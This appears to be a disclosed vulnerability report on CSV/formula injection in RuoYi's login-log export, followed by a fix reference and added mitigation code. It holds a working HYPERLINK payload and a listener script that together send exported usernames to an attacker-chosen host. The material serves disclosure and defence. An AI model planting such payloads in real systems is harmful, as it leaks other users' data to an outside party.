The product has a CSV injection vulnerability. For example, the CSV injection vulnerability can be used to obtain login accounts.
1. When a user logs in, change the value of username in the "/login" request to =HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E") using the Burp Suite tool.


2. Run the Python script to start the HTTP service on port 8007.
```python
from http.server import HTTPServer, BaseHTTPRequestHandler
import json

data = {'result': 'this is a test'}
# You can change **localhost** to the IP address of the hacker's computer.
host = ('localhost', 8007)


class Resquest(BaseHTTPRequestHandler):
    def do_GET(self):
        # Answer every GET with a small JSON body; the request line
        # (including the query string) is logged by the base handler.
        self.send_response(200)
        self.send_header('Content-type', 'application/json')
        self.end_headers()
        self.wfile.write(json.dumps(data).encode())


if __name__ == '__main__':
    server = HTTPServer(host, Resquest)
    print("Starting server, listen at: %s:%s" % host)
    server.serve_forever()
```
3. Choose "日志管理"->"登录日志" ("Log Management"->"Login Log") to view the logs, and export the .xlsx log file.

4. Open the .xlsx log file and double-click the cell containing =HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E"). Then click an empty cell, and then click the cell containing =HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E"). In this case, a request is sent to localhost:8007.
The contents of cells B2 and B3 are admin and test1.

[Screenshot: before double-click.]

[Screenshot: after double-click, and then clicking E.]

A request is sent to localhost:8007 through the browser.

5. The HTTP service on port 8007 receives the following information:
127.0.0.1 - - [18/Jan/2022 17:04:07] "GET /?u=admintest1 HTTP/1.1" 200 -

So we get the user "admin"/"test1"/...
@sanlang Fixed, you can update the code.
Block formulas when exporting Excel, to prevent the CSV injection risk
https://gitee.com/y_project/RuoYi/commit/e9ebf86ac8a53bfc8475c7efad6f63a593eaefa9
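The fix referenced above neutralises formulas at export time. The following is an added example of that mitigation written for this page; it is not RuoYi's code and not the linked commit. It assumes nothing about the project's classes: `is_formula_like`, `sanitize_cell`, `find_suspicious_cells`, `export_csv`, `SAMPLE_LOGIN_LOG` and `FIELDS` are names chosen here, the sample login-log rows are constructed, and the payload row is the report's payload with its URL encoding decoded. It follows the common guidance of prefixing any cell that starts with a formula trigger character with an apostrophe so the spreadsheet displays it as text, and it also shows a defender-side scan that flags such cells before a log is exported.

```python
# Added example (not RuoYi's own code): neutralise spreadsheet formula
# injection in user-controlled values written to an exported sheet.
import csv
import io

# Leading characters that make Excel / LibreOffice evaluate a cell as a
# formula. A formula can carry HYPERLINK and similar functions, so any
# user-controlled field (here: the username in a login log) must be
# neutralised before export.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed sample rows standing in for an exported login log.
# Row 2 is the report's payload, URL-decoded (%26 -> &, %2c -> ,).
SAMPLE_LOGIN_LOG = [
    {"username": "admin", "status": "success", "ip": "127.0.0.1"},
    {"username": "test1", "status": "success", "ip": "127.0.0.1"},
    {"username": '=HYPERLINK("http://localhost:8007?u="&B2&B3,"E")',
     "status": "fail", "ip": "127.0.0.1"},
    {"username": "-1", "status": "fail", "ip": "127.0.0.1"},
]
FIELDS = ["username", "status", "ip"]


def is_formula_like(value):
    """True if a string would be evaluated as a formula by a spreadsheet."""
    return isinstance(value, str) and value[:1] in FORMULA_TRIGGERS


def sanitize_cell(value):
    """Prefix a formula-like string with an apostrophe so the sheet shows it
    as literal text. Non-strings and harmless strings are returned unchanged."""
    if is_formula_like(value):
        return "'" + value
    return value


def find_suspicious_cells(rows):
    """Defender-side check: return (row_index, column, value) for every cell
    that looks like a formula, e.g. to alert when a log is about to be
    exported with attacker-controlled content in it."""
    hits = []
    for index, row in enumerate(rows):
        for column, value in row.items():
            if is_formula_like(value):
                hits.append((index, column, value))
    return hits


def export_csv(rows, fieldnames):
    """Write rows as CSV text with every cell neutralised. QUOTE_ALL also
    quotes separators, so a ',' inside a payload cannot split into extra
    cells, and embedded double quotes are doubled by the csv module."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames,
                            quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({k: sanitize_cell(row.get(k, "")) for k in fieldnames})
    return buf.getvalue()


if __name__ == "__main__":
    for hit in find_suspicious_cells(SAMPLE_LOGIN_LOG):
        print("formula-like cell:", hit)
    print(export_csv(SAMPLE_LOGIN_LOG, FIELDS))
```

The apostrophe prefix is applied on the first character only, which is what spreadsheet applications key on; the same `sanitize_cell` call belongs in an .xlsx writer as well, since the report's export is .xlsx and the formula evaluation happens in the spreadsheet, not in the file format.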